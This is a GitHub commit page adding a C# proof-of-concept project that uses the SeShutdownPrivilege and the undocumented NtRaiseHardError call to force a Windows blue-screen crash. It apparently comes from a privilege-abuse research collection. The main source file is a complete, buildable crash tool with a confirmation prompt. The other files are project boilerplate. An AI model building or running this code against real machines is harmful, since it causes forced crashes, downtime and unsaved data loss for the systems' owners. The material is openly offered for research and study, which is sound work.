-
Notifications
You must be signed in to change notification settings - Fork 121
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
ddfec09
commit e4e702b
Showing
6 changed files
with
327 additions
and
1 deletion.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,6 @@ | ||
<?xml version="1.0" encoding="utf-8" ?> | ||
<configuration> | ||
<startup> | ||
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /> | ||
</startup> | ||
</configuration> |
36 changes: 36 additions & 0 deletions
36
PrivilegedOperations/SeShutdownPrivilegePoC/Properties/AssemblyInfo.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,36 @@ | ||
using System.Reflection; | ||
using System.Runtime.CompilerServices; | ||
using System.Runtime.InteropServices; | ||
|
||
// General Information about an assembly is controlled through the following | ||
// set of attributes. Change these attribute values to modify the information | ||
// associated with an assembly. | ||
[assembly: AssemblyTitle("SeShutdownPrivilegePoC")] | ||
[assembly: AssemblyDescription("")] | ||
[assembly: AssemblyConfiguration("")] | ||
[assembly: AssemblyCompany("")] | ||
[assembly: AssemblyProduct("SeShutdownPrivilegePoC")] | ||
[assembly: AssemblyCopyright("Copyright © 2022")] | ||
[assembly: AssemblyTrademark("")] | ||
[assembly: AssemblyCulture("")] | ||
|
||
// Setting ComVisible to false makes the types in this assembly not visible | ||
// to COM components. If you need to access a type in this assembly from | ||
// COM, set the ComVisible attribute to true on that type. | ||
[assembly: ComVisible(false)] | ||
|
||
// The following GUID is for the ID of the typelib if this project is exposed to COM | ||
[assembly: Guid("9e36ae6e-b9fd-4b9b-99ba-42d3eacd7506")] | ||
|
||
// Version information for an assembly consists of the following four values: | ||
// | ||
// Major Version | ||
// Minor Version | ||
// Build Number | ||
// Revision | ||
// | ||
// You can specify all the values or you can default the Build and Revision Numbers | ||
// by using the '*' as shown below: | ||
// [assembly: AssemblyVersion("1.0.*")] | ||
[assembly: AssemblyVersion("1.0.0.0")] | ||
[assembly: AssemblyFileVersion("1.0.0.0")] |
224 changes: 224 additions & 0 deletions
224
PrivilegedOperations/SeShutdownPrivilegePoC/SeShutdownPrivilegePoC.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,224 @@ | ||
using System; | ||
using System.Collections.Generic; | ||
using System.Linq; | ||
using System.Text; | ||
using System.Runtime.InteropServices; | ||
|
||
namespace SeShutdownPrivilegePoC | ||
{ | ||
class SeShutdownPrivilegePoC | ||
{ | ||
/* | ||
* P/Invoke : Enums | ||
*/ | ||
[Flags] | ||
enum FormatMessageFlags : uint | ||
{ | ||
FORMAT_MESSAGE_ALLOCATE_BUFFER = 0x00000100, | ||
FORMAT_MESSAGE_IGNORE_INSERTS = 0x00000200, | ||
FORMAT_MESSAGE_FROM_STRING = 0x00000400, | ||
FORMAT_MESSAGE_FROM_HMODULE = 0x00000800, | ||
FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000, | ||
FORMAT_MESSAGE_ARGUMENT_ARRAY = 0x00002000 | ||
} | ||
|
||
enum HARDERROR_RESPONSE | ||
{ | ||
ResponseReturnToCaller, | ||
ResponseNotHandled, | ||
ResponseAbort, | ||
ResponseCancel, | ||
ResponseIgnore, | ||
ResponseNo, | ||
ResponseOk, | ||
ResponseRetry, | ||
ResponseYes | ||
} | ||
|
||
enum HARDERROR_RESPONSE_OPTION | ||
{ | ||
OptionAbortRetryIgnore, | ||
OptionOk, | ||
OptionOkCancel, | ||
OptionRetryCancel, | ||
OptionYesNo, | ||
OptionYesNoCancel, | ||
OptionShutdownSystem | ||
} | ||
|
||
enum MESSAGEBOX_RETURN | ||
{ | ||
IDOK = 1, | ||
IDCANCEL = 2, | ||
IDABORT = 3, | ||
IDRETRY = 4, | ||
IDIGNORE = 5, | ||
IDYES = 6, | ||
IDNO = 7, | ||
IDTRYAGAIN = 10, | ||
IDCONTINUE = 11 | ||
} | ||
|
||
enum MESSAGEBOX_TYPE : uint | ||
{ | ||
MB_APPLMODAL = 0x00000000u, | ||
MB_DEFBUTTON1 = 0x00000000u, | ||
MB_OK = 0x00000000u, | ||
MB_OKCANCEL = 0x00000001u, | ||
MB_ABORTRETRYIGNORE = 0x00000002u, | ||
MB_YESNOCANCEL = 0x00000003u, | ||
MB_YESNO = 0x00000004u, | ||
MB_RETRYCANCEL = 0x00000005u, | ||
MB_CANCELTRYCONTINUE = 0x00000006u, | ||
MB_ICONSTOP = 0x00000010u, | ||
MB_ICONERROR = 0x00000010u, | ||
MB_ICONHAND = 0x00000010u, | ||
MB_ICONQUESTION = 0x00000020u, | ||
MB_ICONEXCLAMATION = 0x00000030u, | ||
MB_ICONWARNING = 0x00000030u, | ||
MB_ICONINFORMATION = 0x00000040u, | ||
MB_ICONASTERISK = 0x00000040u, | ||
MB_DEFBUTTON2 = 0x00000100u, | ||
MB_DEFBUTTON3 = 0x00000200u, | ||
MB_DEFBUTTON4 = 0x00000300u, | ||
MB_SYSTEMMODAL = 0x00001000u, | ||
MB_TASKMODAL = 0x00002000u, | ||
MB_HELP = 0x00004000u, | ||
MB_SETFOREGROUND = 0x00010000u, | ||
MB_DEFAULT_DESKTOP_ONLY = 0x00020000u, | ||
MB_TOPMOST = 0x00040000u, | ||
MB_RIGHT = 0x00080000u, | ||
MB_RTLREADING = 0x00100000u, | ||
MB_SERVICE_NOTIFICATION = 0x00200000u | ||
} | ||
|
||
/* | ||
* P/Invoke : Win32 APIs | ||
*/ | ||
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)] | ||
static extern int FormatMessage( | ||
FormatMessageFlags dwFlags, | ||
IntPtr lpSource, | ||
int dwMessageId, | ||
int dwLanguageId, | ||
StringBuilder lpBuffer, | ||
int nSize, | ||
IntPtr Arguments); | ||
|
||
[DllImport("kernel32.dll", SetLastError = true)] | ||
static extern bool FreeLibrary(IntPtr hLibModule); | ||
|
||
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Ansi)] | ||
static extern IntPtr LoadLibrary(string lpFileName); | ||
|
||
[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)] | ||
static extern int MessageBox( | ||
IntPtr hWnd, | ||
string lpText, | ||
string lpCaption, | ||
MESSAGEBOX_TYPE uType); | ||
|
||
[DllImport("ntdll.dll")] | ||
static extern int NtRaiseHardError( | ||
int ErrorStatus, | ||
uint NumberOfParameters, | ||
IntPtr /* PUNICODE_STRING */ UnicodeStringParameterMask, | ||
IntPtr Parameters, | ||
HARDERROR_RESPONSE_OPTION ResponseOption, | ||
out HARDERROR_RESPONSE Response ); | ||
|
||
|
||
static string GetWin32ErrorMessage(int code, bool isNtStatus) | ||
{ | ||
var message = new StringBuilder(); | ||
var messageSize = 255; | ||
FormatMessageFlags messageFlag; | ||
IntPtr pNtdll; | ||
message.Capacity = messageSize; | ||
|
||
if (isNtStatus) | ||
{ | ||
pNtdll = LoadLibrary("ntdll.dll"); | ||
messageFlag = FormatMessageFlags.FORMAT_MESSAGE_FROM_HMODULE | | ||
FormatMessageFlags.FORMAT_MESSAGE_FROM_SYSTEM; | ||
} | ||
else | ||
{ | ||
pNtdll = IntPtr.Zero; | ||
messageFlag = FormatMessageFlags.FORMAT_MESSAGE_FROM_SYSTEM; | ||
} | ||
|
||
int ret = FormatMessage( | ||
messageFlag, | ||
pNtdll, | ||
code, | ||
0, | ||
message, | ||
messageSize, | ||
IntPtr.Zero); | ||
|
||
if (isNtStatus) | ||
FreeLibrary(pNtdll); | ||
|
||
if (ret == 0) | ||
{ | ||
return string.Format("[ERROR] Code 0x{0}", code.ToString("X8")); | ||
} | ||
else | ||
{ | ||
return string.Format( | ||
"[ERROR] Code 0x{0} : {1}", | ||
code.ToString("X8"), | ||
message.ToString().Trim()); | ||
} | ||
} | ||
|
||
static bool RaiseBSOD() | ||
{ | ||
int STATUS_SUCCESS = 0; | ||
int STATUS_ACCESS_VIOLATION = Convert.ToInt32("0xC0000005", 16); | ||
|
||
int ntstatus = NtRaiseHardError( | ||
STATUS_ACCESS_VIOLATION, | ||
0, | ||
IntPtr.Zero, | ||
IntPtr.Zero, | ||
HARDERROR_RESPONSE_OPTION.OptionShutdownSystem, | ||
out HARDERROR_RESPONSE Response); | ||
|
||
if (ntstatus != STATUS_SUCCESS) | ||
{ | ||
Console.WriteLine("[-] Failed to raise hard error."); | ||
Console.WriteLine(" |-> {0}\n", GetWin32ErrorMessage(ntstatus, true)); | ||
|
||
return false; | ||
} | ||
|
||
Console.WriteLine("[+] NtRaiseHardError API is called successfully."); | ||
|
||
return true; | ||
} | ||
|
||
static void Main() | ||
{ | ||
Console.WriteLine("[*] If you have SeShutdownPrivilege, you can raise hard error."); | ||
Console.WriteLine("[*] This PoC tries to cause BSOD with hard error."); | ||
|
||
int ret = MessageBox( | ||
IntPtr.Zero, | ||
"This PoC will cause BSOD.\nAre you ready?", | ||
"Alert", | ||
MESSAGEBOX_TYPE.MB_OKCANCEL); | ||
|
||
if ((MESSAGEBOX_RETURN)ret != MESSAGEBOX_RETURN.IDOK) | ||
{ | ||
Console.WriteLine("[*] Abort."); | ||
return; | ||
} | ||
|
||
Console.WriteLine("[>] Trying to raise hardware error."); | ||
|
||
RaiseBSOD(); | ||
} | ||
} | ||
} |
54 changes: 54 additions & 0 deletions
54
PrivilegedOperations/SeShutdownPrivilegePoC/SeShutdownPrivilegePoC.csproj
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,54 @@ | ||
<?xml version="1.0" encoding="utf-8"?> | ||
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | ||
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" /> | ||
<PropertyGroup> | ||
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration> | ||
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform> | ||
<ProjectGuid>{9E36AE6E-B9FD-4B9B-99BA-42D3EACD7506}</ProjectGuid> | ||
<OutputType>Exe</OutputType> | ||
<RootNamespace>SeShutdownPrivilegePoC</RootNamespace> | ||
<AssemblyName>SeShutdownPrivilegePoC</AssemblyName> | ||
<TargetFrameworkVersion>v4.5</TargetFrameworkVersion> | ||
<FileAlignment>512</FileAlignment> | ||
<Deterministic>true</Deterministic> | ||
</PropertyGroup> | ||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' "> | ||
<PlatformTarget>AnyCPU</PlatformTarget> | ||
<DebugSymbols>true</DebugSymbols> | ||
<DebugType>full</DebugType> | ||
<Optimize>false</Optimize> | ||
<OutputPath>..\bin\Debug\</OutputPath> | ||
<DefineConstants>DEBUG;TRACE</DefineConstants> | ||
<ErrorReport>prompt</ErrorReport> | ||
<WarningLevel>4</WarningLevel> | ||
<Prefer32Bit>false</Prefer32Bit> | ||
</PropertyGroup> | ||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' "> | ||
<PlatformTarget>AnyCPU</PlatformTarget> | ||
<DebugType>pdbonly</DebugType> | ||
<Optimize>true</Optimize> | ||
<OutputPath>..\bin\Release\</OutputPath> | ||
<DefineConstants>TRACE</DefineConstants> | ||
<ErrorReport>prompt</ErrorReport> | ||
<WarningLevel>4</WarningLevel> | ||
<Prefer32Bit>false</Prefer32Bit> | ||
</PropertyGroup> | ||
<ItemGroup> | ||
<Reference Include="System" /> | ||
<Reference Include="System.Core" /> | ||
<Reference Include="System.Xml.Linq" /> | ||
<Reference Include="System.Data.DataSetExtensions" /> | ||
<Reference Include="Microsoft.CSharp" /> | ||
<Reference Include="System.Data" /> | ||
<Reference Include="System.Net.Http" /> | ||
<Reference Include="System.Xml" /> | ||
</ItemGroup> | ||
<ItemGroup> | ||
<Compile Include="SeShutdownPrivilegePoC.cs" /> | ||
<Compile Include="Properties\AssemblyInfo.cs" /> | ||
</ItemGroup> | ||
<ItemGroup> | ||
<None Include="App.config" /> | ||
</ItemGroup> | ||
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" /> | ||
</Project> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters